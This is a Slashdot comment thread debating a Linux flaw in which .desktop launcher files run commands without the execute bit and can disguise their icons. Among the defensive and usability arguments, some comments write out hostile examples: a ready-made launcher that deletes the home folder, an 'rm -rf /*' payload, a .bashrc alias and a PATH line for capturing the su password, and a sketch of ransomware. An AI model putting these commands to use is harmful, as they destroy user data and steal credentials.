It's also a safety net. If I manage to bork up my user account, root's still sitting there untouched and I can still log in and repair the damage. It's like having a spare set of car keys in your wallet: you won't lock yourself out often, but when you do it's an incredible relief to pull out your wallet and find you don't have to call for help.

Re:Frost piss

[dc29A]

You have a very narrow view of the advantages of not running root. Let's say you get infected by a well written rootkit/stealthy trojan that quietly sends data from your computer to the crooks. Your keyboard is logged, email is scanned and who knows what else is transmitted. But since it didn't touch your downloads or music is no problem right? Not being root prevents most of dangerous malware from instantly hijacking your PC. It's far from being the silver bullet security solution but it's a must, unless you like to have your personal data sent to Igor in Vladivostok.

Re:Frost piss

[lord_sarpedon]

You are making it sound like you need root access for a keylogger. That's not true when input is going to X, which is true the majority of the time for all desktop users.

I keep saying this on slashdot but should really get off my ass and do something about it. The Unix security model is totally useless in the context of a desktop machine. So is the Windows security model. Processes are not the users that run them.
PolicyKit needs to be extended to delegate just "superuser" actions but normal actions as well, by program. It should be much like the OLPC or similarly Android - apps which are installed / run the first time should have to ask for a set of permissions they need. These permissions are to be changeable only by the user via a privileged frontend. If my desktop environment happens to start a scary .desktop file, it wouldn't matter. It wouldn't have access to my ~, to the network, or XQueryKeymap...unless it asked nicely first. If something needs to open a document outside of its dot directory it can do so via a _privileged_ file chooser - ask over DBus, and the file that the user picks will be hardlinked into the sandbox.

Re:Frost piss

[Fallingcow]

So, I guess you couldn't stick the keylogger somewhere in ~/bin and make it autoexec via the user session script or some obscure Gnome or KDE session startup file, right?

I'm the only user. Doing that is EXACTLY as bad as sticking the malware off in /usr/bin, and I doubt any Linux virus is going to rely exclusively on the ability to write system directories; I'm sure any that would be aimed at keylogging or password stealing would just do something like what I outlined above if it couldn't write outside of ~/, though probably far stealthier.

Re:Frost piss

[Haeleth]

Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit

Did you read the whole article? It details a way the malware could have a fair chance at root access on a typical home Ubuntu/Fedora-type box simply by taking advantage of documented Gnome features.

Basically it would just create local versions of the regular links to admin tools in the menu system, so the next time the user ran Synaptic (or whatever) it would actually launch the malware with root privileges.

Re:Frost piss

[shutdown+-p+now]

The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.

There's one more thing to it. Whenever UAC is mentioned, the usual response by the /. crowd is "well, dumb users will always click on Allow anyway". The question is, wouldn't they just do the same on, say, Ubuntu, if the malware pops a sudo prompt?

Re:Frost piss

[euxneks]

Reading the article, the "virus" requires the user to actually execute the desktop link in order to execute the malware. How do we protect a user from his own stupidity? Once burned twice shy I say.

Re:Frost piss

[mad_clown]

Dude, lay off Igor. He's actually a pretty nice guy once you get to know him. His brother, Vasilii's a real dick, though.

Re:Frost piss

[jonadab]

> Processes are not the users that run them.

Indeed. We put server apps, such as Apache, in their own unprivileged user accounts, because they handle untrusted data from the internet. Desktop applications that do that (most notably, web browsers and mail readers) really need to be restricted as well, and for approximately the same reasons.

Re:Frost piss

[Todd+Knarr]

If you need to enter your password or otherwise elevate privileges that often, your system design's irrevocably broken. On my Linux system I only need to gain root privileges maybe once a week or so. Mostly that's when I'm updating packages or installing new ones, and occasionally when I'm doing something like reconfiguring printers or messing with server configurations. 98% of the software simply doesn't require special privileges once it's been installed properly, and any occurrence of that password-prompt dialog when I wasn't doing one of the very few things that I know will require it triggers an immediate red flag and an automatic press of the "Cancel" button until I've figured out exactly what was doing something it shouldn't've been.

In contrast, you can do very little with UAC active without having to answer a prompt. That constant stream of prompts just trains users to accept them and "just click OK". And that automatic acceptance of the prompt as a normal thing is exactly the cause of so many security issues in Windows.

Re:Frost piss

[k8to]

Uh, what are "nearly root" permissions?

Unix doesn't support this.

Re:Frost piss

[digitalunity]

I don't necessarily think UAC is a bad idea, just badly implemented by MS. The UAC prompt doesn't display enough information for the user to make an informed decision. A good example is "File Operation". It's quite vague. Do I allow it? What exactly is the program trying to do?

Gnome's privilege escalation isn't much more informative either.

It's a good concept but obviously needs further development.

Re:Frost piss

[Fallingcow]

Er, I have no idea how that got posted anonymously. Yeah, that was me.

Not really news...

[Yvanhoe]

It still requires a user to save an attachment and execute it. The new thing here is that it saves a file in a format Gnome or KDE recognizes as a script (a launcher file) even without the execution bit set. I am unsure about what it demonstrates.

The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.

Re:Not really news...

[geantvert]

The first problem is indeed that a desktop file does not require the executable bit to be executed (from Nautilus) by double-clicking it.

The second problem is that the file content specifies it icon, name and tooltip regardless of the filename of the desktop file.

For example, a very efficient way to fool people could be to disguise the desktop file into one of the default icons of the desktop (Trash, Computer, Home, ...)

For the virus writer the only problem is to get the desktop file to be saved in the Desktop directory.

Humm... Guess what is the default directory of most applications for saving uploaded files? I give you an hint. The name starts by a 'D'.

Even better, it is possible to specify that the Desktop is the HOME. I haven't checked recently but that I remember that this used to be the default in Ubuntu.

My advice is simple: Start gconf-editor and disable the configuration key /apps/nautilus/preferences/show_desktop to get rid of all desktop icons.

Re:Not really news...

[AceJohnny]

It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.

I'd say it's not so much stupidity than human psychology, and that most people aren't educated to recognize these dangers. I'll refer you to what security and user interface designers refer to as the
Dancing Bunnies problem.

The main workaround is to have users work in a sandbox. That way, if they blow something up, it's just their sandbox. The sandbox could be their home directory, or a virtual machine. Windows historically didn't sandbox (defaults to admin rights, which changed in Vista). Unix does (user permissions).

I find it hilariously ironic, because Windows has a sophisticated permission system (ACLs) by default since (at least) Windows 2k, whereas most Distributions I know still default to the User/Group/Other bits.

Re:Not really news...

[extrasolar]

The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.

Which is wrong and has always been wrong by the way. And it's not "open, save, and double click" not "open, save and execute".

When someone double clicks an icon that signifies it's an image file, that action should not execute an arbitrary command on your system. There needs to be some sort of guarentee that the icon chosen to represent a file actually represents the file. There is no guarentee with .desktop files. This is a bug damn it, not a feature!

And you have a strange definition of "stupidity" which goes something like this: "Not paranoid enough about the interface because it is possible for attachments to deceive the user as to their nature." The interface is broken, that's all there is to it. But it doesn't surprise me that your average GNU/Linux user doesn't think that a broken interface is a problem; obviously we're dealing with the stupid user again who hasn't learned the proper degree of paranoia about what the interface depicts to the user.

PS: Just so you know, I'm a huge free software supporter. The great thing about open development is that bugs, when found, often get fixed, but this mentality falls short of the interface and real usability bugs. People, even advanced GNU/Linux gurus, succumb to usability pitfalls, when you're tired or in a hurry or intoxicated or who knows what. I'm not saying we should prevent the user from doing anything harmful to his system (a common strawman on this forum). But it should be obvious to everyone except for this site that if the icon shows that it's a picture file or a spreadsheet or whatever else, that that is what the interface should be. The RIGHT behavior is that the icon representation must reflect truly what is being represented.

Re:Not really news...

[bonch]

It still requires a user to save an attachment and execute it.

One of the points of the article is that Linux is as vulnerable as Windows. You say it requires a user to execute something--well, so does Windows malware.

The new thing here is that it saves a file in a format Gnome or KDE recognizes as a script (a launcher file) even without the execution bit set. I am unsure about what it demonstrates.

It demonstrates how to download an arbitrary script from a malware server using a launcher without the need for an execute bit, as well as setting the script to autostart on boot. There is also an appendix talking about gaining root.

Re:Not really news...

[JesseMcDonald]

There needs to be some sort of guarentee that the icon chosen to represent a file actually represents the file. ... But it should be obvious to everyone except for this site that if the icon shows that it's a picture file or a spreadsheet or whatever else, that that is what the interface should be.

How do you expect to enforce that, while still allowing applications to supply meaningful, identifiable icons for themselves? Need I remind you that the A.I. problem remains unsolved? Requiring the OS to visually identify each icon and infer its meaning is not a practical solution.

Or do you suggest that all applications should be labeled with the same useless "executable file" icon? That is more doable, but it would represent a major step backward in usability.

All that's really needed is to treat .desktop files as a form of program; they would then require execute privileges not conferred simply by saving an attachment or Internet file to disk. Problem solved.

Re:Not really news...

[jonadab]

> My advice is simple: Start gconf-editor and disable the configuration key
> /apps/nautilus/preferences/show_desktop to get rid of all desktop icons.

I'll go you one better: remove Nautilus from your Gnome session. It's a system hog, and I promise you don't need it. Graphical file managers are nothing but a worthless annoying pain ever since tab completion was invented. As for icons on the desktop, why would you want to have to minimize everything every single time you want to start a program? Create a second panel (I recommend left-side) and put your launchers there.

I got rid of Nautilus years ago, just a few hours after upgrading to a distribution that included it. RAM was more expensive back then, and so my new fresh install was manifesting undesirable performance characteristics due to swapping all the time. I did some checking, and one of the biggest memory users was this thing called Nautilus. "What's this", I asked, "and why is something I've never heard of before, which I *certainly* didn't make a conscious decision to run, using almost as much RAM as OpenOffice?"

At the time I didn't know how to remove things from my Gnome session, so I just did chmod -x and kill. Solved.

Re:Not really news...

[Yvanhoe]

And you have a strange definition of "stupidity" which goes something like this: "Not paranoid enough about the interface because it is possible for attachments to deceive the user as to their nature."

Ok, calling it stupidity is a bit exagerated, but it is a flaw in human behavior that is pretty cross-platform and almost impossible to prevent with other means than education : "if you don't understand what a given file is, just don't execute it. And if you don't know the difference between opening and executing file, just don't double-click it."

Re:Protect your self with encryption

[B5_geek]

I realize that you are only 19 years old and new to this Internet thing. Posting link spam like you have been doing is considered bad etiquette.

Please stop, we do not like it here.

Virus?

[Carewolf]

It relies on the user downloading saving and running a shell-script. The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.

Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.

Re:Virus?

[Ed+Avis]

It depends on the user clicking to 'save attachment'. The attachment is not in fact a shell script but a .desktop file. If it goes to the desktop background (as is often the default when saving files) then it can choose any icon it wishes, disguising itself as a plain text file or a JPEG image or even another copy of the 'Computer' icon that launches the file browser.

Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.

That would solve this issue at a stroke (even though many of the other ideas people have suggested are also worthwhile) and it's amazing it hasn't been done years ago.

Re:Virus?

[JesseMcDonald]

The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.

Not quite; this "shell script" (desktop file) also has the ability to arbitrarily override its displayed icon and label. One possible scenario:

1. User saves what appears to be an image to the desktop.
2. User fails to notice that this "image" has a .desktop extension. (The real filename may not have been visible to begin with.)
3. On desktop, "image" has a valid icon and a label ending in ".jpg".
4. User opens the "image", which is actually a launcher for "sh -c 'rm -rf /*'".

Requiring the executable bit for .desktop launchers is the obvious solution, but rather than enforce this in the DE the .desktop files should become scripts (with a #! line). The DE could then treat them as it would any other executable file. Non-executable .desktop files would be limited to opening documents and the like.

Re:Virus?

[pseudonomous]

Yeah, it's not really a new kind of vulnerability, or a particularly dangerous one, but it sure's something that ought to get fixed. Hopefully without having to rewrite too much Gnome/Kde code.

also

The article doesn't mention it, but I take it Xfce would be vulnerable to this exploit as well? On the other hand, most non-DE window managers should be immune.

Re:Virus?

[tixxit]

Well, at least sh -c 'rm -rf /*' wouldn't kill most installs, as most people don't run as root. Would still be super annoying to reload user files from a back up though.

Re:Virus?

[Teun]

The article does mention it:

Thunar?

Interestingly, the Thunar file manager under xfce (Xubuntu 8.10) is doing something that Gnome's and KDE's file managers are not doing: It will flag the desktop launcher file as potential malware and thus prevent execution via a simple click.

Re:Virus?

[scientus]

it wouldnt have to be treated specially, it would just have to be done the normal way, by having gnome/kde as the intrepreter to the shell/.desktop script.

Re:Virus?

[ion.simon.c]

the KDE folks are (once again) thinking this through. Look for a message posted to the kde-core mailing list entitled "requiring .desktop files to be executable ?" by Alexander Neundorf.

Re:Virus?

[Carewolf]

Saving to the desktop is only default in stupid programs such as Firefox. KDE programs doesn't save to the Desktop. In KDE4 there isn't even a "desktop" to save to.

Re:Virus?

[TheLink]

Since we're talking about desktop computers, who in their right mind cares about "installs"?

I care more about user data.

I can get "install" data from the DVD/CD and Distro update service.

But I cannot always retrieve the most recent user data from backups.

Losing a day's work or even an hour's work can be more pain than having to reinstall the OS.

Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significant work.

Re:Virus?

[Ed+Avis]

I believe the problem may still apply when saving to other directories: the file browser can still show .desktop files with an icon and name of their choosing, and execute them when you double-click, even if they are not marked executable.

Re:Virus?

[Grishnakh]

Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.

Interestingly, most modern handguns are designed exactly this way: they have no separate safety switches. Instead, all safety devices are passive: just by holding the gun properly and pulling the trigger normally (and not dropping it), the user deactivates the safeties and fires the weapon. Only older handguns, like the 1911, and long guns (rifles and shotguns) have a separate safety switch any more.

Tactically, it works out a lot better this way. The presumption is that if you're holding the gun properly and pulling the trigger properly, you obviously want to fire the gun. If you don't want to fire it, you'd keep your finger out of the trigger guard area. Well-designed internal drop safeties protect against accidental discharges resulting from dropping the weapon. By not having a separate safety switch, there's less potential for you to fail to fire while under duress, since all you have to do is point and shoot.

Of course, this also presumes non-stupid use by the user, since playing around with the gun will obviously easily result in a negligent discharge. Maybe it's similar with KDE/GNOME: they're presuming (perhaps wrongly) that you won't double-click on a .desktop file without intending to run it, and asking first is a waste of time.

Re:Virus?

[tixxit]

Good point.

Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significant work.

However, you're a bit of a condescending prick.

Re:Virus?

[TheLink]

Yes I am, but hopefully I'll improve as time goes by :).

Boo-ya!

[Akir]

Time for everyone to switch to Enlightenment. Take that, desktop metaphor!

Re:Boo-ya!

[krenshala]

Don't you mean WindowMaker? ;)

Re:Does not work as advertised

[argiedot]

I am a bloody fool. I managed to read the article without reading the article. It works.

Re:Stay away from root

[argiedot]

Well, the author here seems to emphasise that that won't help because on a single-user account, your priority is your data. If you lose your system but your data isn't compromised, you lose very little that can't be replaced. If you lose your data but your operating system is functional, you have lost nearly everything of value.

Wow, please mod this to -1

[Dripdry]

Sorry, wrong thread, too many tabs.

Re:Protect your self with encryption

[JesseMcDonald]

Why do shortcuts need to have the ability to run code?

The shortcut only contains parameters for the path to the application and a list of parameters; it doesn't run any code itself. The problem is that the application can be (e.g.) /usr/bin/perl, and the parameters "-e 'perl code here'". Removing this ability would seriously impact the usefulness of the shortcuts.

The real issue is that the DEs are blindly trusting a non-executable file of unknown source to provide this information. The solution has already been suggested: turn all .desktop files into scripts (via a #! line, which is already valid comment syntax), mark them as executable, and have the DE run them like any other executable file. Non-executable .desktop files which link to applications would be displayed as usual, but would be treated as documents rather than launchers.

Did you even RTFA?

[brunes69]

He is not talking about shell scripts at all. The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless. So all they have to do is save it and click on it.

Re:Did you even RTFA?

[argiedot]

Yes, I read it again after it struck me that it seemed rather odd that something so obvious would be called a 'security flaw'. You are right and I am wrong.

Re:Did you even RTFA?

[styryx]

You are right and I am wrong.

W...w...wh....what the fuck just happened?! Am I on the internet still?

Re:Did you even RTFA?

[gr8_phk]

The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless.

Is there a "reason" for that? I mean a real technical reason of course. What would be the damage if the DE obeyed the +x bit for these?

Re:Did you even RTFA?

[shutdown+-p+now]

Yes, and the year is still 1996, too.

Great news

[AlHunt]

So we have a long-known, unaddressed vulnerability and easily accessible instructions on writing a Linux virus.

Does this mean Linux is finally "ready for the desktop"?

Re:Great news

No, it means malware is finally ready for the .desktop

Re:Great news

[gzipped_tar]

I get your humor, but this may be the only way for Linux to claim the "year of Linux on the desktop".

I mean bug-to-bug, bullshit-to-bullshit compliance to MS Windows. People are fed crap to grow up and they asks for more crap. At least this is what I think I got from GNOME.

I use to have a sig. saying "so this is how Linux dies -- with thunderous applause." I changed it after being protested by someone as AC (and partly in fear of being sued by LucasFilm ;) I've always feared that the year of Linux on the desktop would be the year of its death, because the line between "being popular" and "lowering standards to cater to the mass" is so easily blurred.

Luckily I've escaped to using minimal WMs and I'm not that dependent on the GUI.

Anyone can think I'm an elitist troll and mod me down accordingly. I'm open to mods and criticism because I know I may be wrong. OTOH I mean what I said. I like Linux and I'll be more than happy to see it prevailing. However, according to the current computer-literacy of your typical desktop user I can only say that the desktop market is not ready for Linux. Shovelling it down your average user's throat (and trying to prioritize "making it a less painful process") could result in the degradation of Linux.

Re:Great news

[AlHunt]

I have a test case running right now. A 60-odd year old gentleman, with close to zero computer experience, was given a 3 or 4 year old PC and wanted to use it. Win2000 was installed and password protected. I wiped the disk, installed Ubuntu and gave the machine back without saying too much about MS, Linux or what-have-you. It'll be interesting to see how he makes out.

I will say that the Ubuntu install was totally painless - it recognized and correctly configued all the hardware without an internet connection.

Re:Great news

[Saint+Stephen]

You really shouldn't call your dad a "test case."

Re:Great news

[Thaelon]

I think that firstly, "the year of the linux desktop" will come so gradually that it won't make headlines.

Just like there's no "year of the internet" (discounting eternal September) or "year of the jet engine" etc.

Secondly, until 80% of users can make everything work without editing a text file or running terminal commands Linux isn't ready for the masses. And yes, it's Linux that has to change, the masses simply won't. There are new ones born every minute.

We've come a long way, with Ubuntu but I still find things in the forums where you have to edit your /etc/X11/xorg.conf or whatever to fix things. Another example: I still can't use my Razer Diamond back in Linux without it being unusably sensitive. So far the only fix I've found for the garbage mouse pointer behavior requires that I recompile X with a patch file. And even I haven't attempted that yet. It's not that I couldn't figure it out eventually, it's that I'd rather spend the time playing computer games, watching youtube videos, spamming the stumbleupon button, or clicking pretty widgets to kill time.

In short:
Recompiling things = not ready for the masses.
Editing text files to make shit work = not ready for the masses.
Everything works out of the box = ready for the masses. (Defaults are that important)

Re:Protect your self with encryption

[kcbanner]

Ah, I see. I suppose another solution could be warning the user the first time they run a shortcut that uses perl/python/ruby/php/whatever scripting language. Maybe pop up a window displaying the parameters even they are longer than X characters.

Re:Protect your self with encryption

[Spazztastic]

I guess my hopes of starting a new meme have been dashed...alas.

I think I speak for us all when I say that there's enough memes and we don't need you trolling /. trying to make a new trend while plugging a blog.

Re:Stay away from root

[johannesg]

And moral of the story is:

Only use root when you have to, and never, EVER log into a desktop as root. If you do this, and there's no problem in doing it in Linux, the vulnerability can't hack your box, it can only hack your account.

The loss can only be to your data, which is typically unique and valuable, as opposed to your operating system, which is easily replaced, you mean?

Wow, that's just great. Can we have an OS with proper sandboxing already? Anything you run in its own container, unable to escape? So you really _can_ run programs from the internet, without any fear of the consequences?

Re:Stay away from root

[jewelises]

For a personal desktop, the user's account is all that matters. It would be a cake piece to then get the user's browse history, e-mail contacts, keystrokes, passwords (including root/sudo password), banking information, etc. as well as send spam, launch ddos, etc.

Today's file managers are going wild...

[gzipped_tar]

Everyone is trying to mimic the brain-dead M$ Way.

Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.

That's why I use file managers almost only for bulk copying / moving. And I still prefer the CLI if the file names are regular-ish enough.

Re:Today's file managers are going wild...

[msuarezalvarez]

You do that. Yet 99.99% of the computer using humans do not. Should they all adapt to the way you do things? Because it is "better"?

Re:Today's file managers are going wild...

[gzipped_tar]

I'm not saying my way is "better" and neither do I advertise it to everyone else. I know it sucks sometimes, from experience. I just think it's a bad thing that all GUI file managers I used (Nautilus, Konquerer & Thunar) are so similar to each other and they are all similar to the M$ stuff (doubleplusungood!)

Maybe I'm just too biased because my limited experience in this area and the "elitist ego", if you call it.

BTW I can foresee some using the the "argument of DIY" on this: "If you want a file manager like that, go code one yourself." Yes, maybe and maybe not. Anyway I'll have to learn GUI programming from ground up to do this.

Re:Today's file managers are going wild...

[msuarezalvarez]

Well, independently of whether you could code it or not: what design choices would you make which are so different from what there currently exists? If you think it is bad that the existing file managers are so similar it probably means youhave considered ways in which they could be different...

It not like the design space for file managers is that huge, you know...

.

Re:Today's file managers are going wild...

[Samah]

Everyone is trying to mimic the brain-dead M$ Way.
Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.

So if you have, for example, the icon for an OpenOffice document on your desktop or displayed in a file browser, you would rather run OO from a menu and find the file from the open dialog? Common sense says otherwise.

If I see an icon representation of a document file, I'd like to be able to just open it and get to work with minimum fuss. Admittedly this can lead to abuse, but I'd hardly call the idea "brain-dead".

Re:Today's file managers are going wild...

[gzipped_tar]

I usually do this in Thunar: navigate to the dir -> right-click, select "open shell here" --> type oowriter XXX where XXX is the file's basename.

Not an optimal solution but at least I get a chance of checking it myself before the "interpreter" (oowriter) does. If the file is suspicious (there are many ways to tell, e.g. the "file" command to check the magic number, checking length or permission, virus scanner, etc), it's likely to be stopped in the way.

You may argue this approach is even more "brain-dead", and there are good reasons to say so. However, consider this: a file manager is essentially a graphic shell that can fork-exec all kinds of executables, in an obscure way. With an old-skool shell you at least know what you are doing, but with a file manager too much dirt is hidden under the carpet. Which is better? I can't say.

BTW you can be a little creative in this usage pattern. Sometimes I navigate to a music directory, right-click and open shell, then do something like ls -1 *.mp3 | sort -R | xargs -d "\n" mplayer -- command line random-order music player :P

Re:Today's file managers are going wild...

[Samah]

You may argue this approach is even more "brain-dead", and there are good reasons to say so. However, consider this: a file manager is essentially a graphic shell that can fork-exec all kinds of executables, in an obscure way. With an old-skool shell you at least know what you are doing, but with a file manager too much dirt is hidden under the carpet. Which is better? I can't say.

Indeed, but my point is that the "double click the icon" functionality for opening documents is what grandma will be used to when you try to move her to Linux. If commonplace GUI functionality like that is missing or is more complex than just a double click, she's most likely going to say "this is too hard".

If the community wants to see Linux as a more competitive contender for the desktop marketplace, it needs to be idiot-proof. I know what I'm doing enough to handle it as a desktop OS, but there's no way I'd get either of my parents to use it, even though my Dad used to be a computer technician.

In fact, the only reason I'm not using Linux as my main OS is because I'm primarily a gamer, and I still think Wine just isn't quite there (for me at least). It's a brilliant piece of software, but unless a game is 100% working such that I wouldn't know I'm in Linux, "good enough" is not good enough. Having said that, "good enough" is good enough for many other Linux users, and that's fine by me. :)

OpenBSD

[jgtg32a]

Linux noobs you should be using OpenBSD from a shell.

Re:OpenBSD

[jonadab]

> Linux noobs you should be using OpenBSD from a shell.

I used BSD for a couple of years, but I got tired of spending three days compiling everything in the ports tree, including basic system tools and libraries, every time I wanted to update anything, including the web browser.

Re:OpenBSD

[Logic+Worshiper]

The first time I tried to install Linux it would only take me into a command prompt. I reinstalled Windows a few days later (I needed my computer for school). Luckily my next experiment with Linux has gone much better (6 months + running Linux only), but I can't say the same for Windows.

Linux Users Don't Backup?!?

[Dareth]

You mean Linux users, besides Linus (we all mirror his important files for him), should be backing up their files!?!

Oh the horror!

Re:Linux Users Don't Backup?!?

[digitalunity]

Don't be so shortsighted. The issue isn't you losing your files. It is that others can obtain your files.

Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

Re:Linux Users Don't Backup?!?

[ChienAndalu]

Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

I sometimes wonder how difficult it would be to obtain the root password from somebody. If the PATH variable has a path that the user has write access to, what's stopping the malware to put a "su" wrapper into that directory? Next time you enter su, the wrapper captures your password, logs you in and deletes itself.

I also think that a keylogger for X11 wouldn't be too difficult to implement.

Re:Linux Users Don't Backup?!?

[ld+a,b]

Exactly, and now some criminal organization somewhere is keeping a backup of your data for you as well.

This is the reason we must focus in making secure software that is trying to stay ahead of exploits - the user isn't trustworthy, he may understand some security implications of his actions, but he will never understand everything.

If I get access to your system I won't delete /bin or your .porn stash. What I will do is copy your .mozilla directory, where I will surely find about your real name, bank accounts, job, and many other things.

You dismiss local exploits as if they were rare, many are undiscovered or ignored. A whole desktop has many applications and you only need a single hole.

But really, that an attacker will just turn your machine into a spambot is the best case scenario.

Re:Linux Users Don't Backup?!?

[Knuckles]

If the PATH variable has a path that the user has write access to,

then the machine admin (or distro creator) is a moron.

Re:Linux Users Don't Backup?!?

[TheLink]

How about secrets like passwords?

The other issue is that your computer can be turned into one of those "zombies", just like the thousands of windows machines out there.

Desktop Linux is just as vulnerable as Windows. The security model is similar if not less secure - by default any program that > 90% of the Linux users out there run, can do whatever that user's account can do.

Given the same sort of users, the same sort of marketshare, there'd be tons of trojans, rootkits, zombies everywhere. If not more so!

After all, stuff like python and perl are typically bundled, and with them you can probably write malware faster than the AV people can keep up with, and with all sorts of features.

I doubt you really need to do that curl/wget thing in the article, I'm sure someone can figure out perl or python one liners to do the whole malware thing while skipping that extra step of fetching the main code from a site that can be easily taken down. What's the line length limit for those desktop files?

For bonus points get it to periodically use search engines to look for new malware code, then fetch and test it for fitness, and run it as a separate instance :).

Re:Linux Users Don't Backup?!?

[ChienAndalu]

On second thought, you don't even need that. The malware just has to do

echo "alias su=/tmp/evilwrapperscript" >> ~/.bashrc

and you're finished

Re:Linux Users Don't Backup?!?

[Knuckles]

True. Though just as the first case can be prevented by mounting /home (or possibly /home/) noexec, this once can be prevented by doing same with /tmp

Re:Linux Users Don't Backup?!?

[Sir_Lewk]

I can personally attest that with a little social engineering, it is quite easy to get unprivileged acess to a computer long enough to do exactly that (though in my case I created an alias for sudo in ~/.bashrc It was an ubuntu installation after all. Granted, with social engineering anything is possible, but it was fun nevertheless.

Re:Linux Users Don't Backup?!?

[ChienAndalu]

Shadow has chmod 600 (on my system at least)

Remember, this is about automatically obtaining the root password without physical access to the machine but with malicious code executed on a desktop computer.

Re:Linux Users Don't Backup?!?

[Knuckles]

(or possibly /home/)

Gah, sorry. /home/<untrustedusers>

Re:Linux Users Don't Backup?!?

[gzipped_tar]

As long as you can login, you can always export your own PATH, no matter being tricked to do so or not. You don't even need that --- nothing prevents an attacker tricking the user to qualify the evil script by it's path (./runThisToWin10000).

Re:Linux Users Don't Backup?!?

[niw]

You could also change the PATH variable for the user. It would work more or less the same and you don't run the risk of /tmp being deleted because the computer reboots.
echo "export PATH=~/bin:\$PATH" >> ~/.bashrc

Re:Linux Users Don't Backup?!?

[Knuckles]

I don't think you solve a problem here, unless you are saying you shouldn't have exec and write privileges at the same time anywhere (and to me that sounds as useful as "just don't turn on your pc").

It's a very common setup in the real world. Someone who is only a user (not an admin and not a developer) does not need to have wx anywhere.

Re:Linux Users Don't Backup?!?

[Knuckles]

As long as you can login, you can always export your own PATH, no matter being tricked to do so or not. You don't even need that --- nothing prevents an attacker tricking the user to qualify the evil script by it's path (./runThisToWin10000).

Of course this requires /home and /tmp to be mounted noexec. This is /. and so I did not think that I needed to write that explicitly.

Re:Linux Users Don't Backup?!?

[zrq]

Someone who is only a user (not an admin and not a developer) does not need to have wx anywhere.

I am both a developer and the sys admin for several machines, so how do I solve the problem on my desktop ?

Re:Linux Users Don't Backup?!?

[Knuckles]

I don't know, I don't think that you can really "solve" it. The question might be whether it needs to be solved. As an admin and dev, are you really in danger of downloading malware that can, for example, change your login scripts and your $PATH?

Re:Linux Users Don't Backup?!?

[m50d]

Don't use su. Only login as actual root, after sysrq-King.

And yeah, an X11 keylogger should be doable, but you shouldn't be becoming root inside X11, ever.

Re:Linux Users Don't Backup?!?

[zrq]

As an admin and dev, are you really in danger of downloading malware ...

Under normal circumstances, no. On a bad day, when I'm concentrating on something else ... perhaps.

As more and more vulnerabilities (and better ways of disguising malware) are found, it increases the chances that one day they will get lucky. Most of the time I'm concentrating on solving my own problems and getting my own code to work, not on watching for potential malware attacks. We have to be careful all of the time, the bad guys only need to get lucky once. I must admit that if something did get access and used my account to do something like add a small cron job which ran when I wasn't at the machine, I doubt if I'd notice it immediately.

I agree with the sentiment in the original article, that we should not get complacent and never be taken in by the increasingly common but equally wrong idea that Linux is somehow invulnerable and 'bullet-proof'.

Re:Linux Users Don't Backup?!?

[Knuckles]

Personally, I really can't imagine this to happen to me, but I totally agree about the sentiment in the original article.

Perhaps it would help not so browse pr0n when concentrating on solving your own problems and getting my own code to work ;)

Re:but wait....

[NeoBrain]

You can still adjust the folder view to show the contents of the Desktop folder. If there's a .desktop file in there, clicking on that file will just behave as with other DEs.

Re:Why?

[Gadget_Guy]

Why would the judge get kickbacks for jailing juveniles (or others)?

Maybe the judge knew that they were all writing Linux viruses.

Maybe I just haven't had enough coffee...

Obviously. You posted to the wrong story. With any luck someone else will also be caffeine deprived and will mod you as Insightful anyway.

Re:Stay away from root

[gzipped_tar]

The real paranoid (in the good sense) user will create a random, disposable, temporary user account for every session and work with it after chrooting into a sandbox -- all these are done in a virtual machine with a disposable disk image running on a LiveUSB host OS ;)

Joking aside, your suggestion is quite reasonable.

Re:Protect your self with encryption

I guess my hopes of starting a new meme have been dashed...alas

Forced meme is forrrrced.

can we see a working example ..

[viralMeme]

"None of that so far required root privileges. And our script now can do whatever it wishes to do within the confines of the user account"

Re:can we see a working example ..

[FudRucker]

[Desktop Entry] Type=Application Name=Cool_Screensaver Exec=rm -r ~/*

paste the above four lines in to a text file named screensaver.desktop and execute it while in gnome or KDE, DANGER this is can delete everything in your /home/$USER directory so please do not actually run this...

Re:can we see a working example ..

[Creepy+Crawler]

I like the idea of ransomware.

'Pretty game runs'. While playing, it downloads say 10 pubkeys from GPG server. Then proceeds to encrypt ~ to those 10 keys whilst overwriting every file there.

Now, game shows nasty message: Your shit has been encrypted. Pay X or fcuk off.

Re:can we see a working example ..

[FudRucker]

[Desktop Entry]

Type=Application

Name=Cool_Screensaver

Exec=rm -r ~/*

fixed it, DO NOT DO THIS!

Re:can we see a working example ..

[viralMeme]

"Okay... did that... now what?"

I meant a clickable link or email attachment ..

Re:Stay away from root

[Chris+Mattern]

Well, the author here seems to emphasise that that won't help because on a single-user account, your priority is your data.

Which you have backed up, RIGHT?

Re:Protect your self with encryption

[JesseMcDonald]

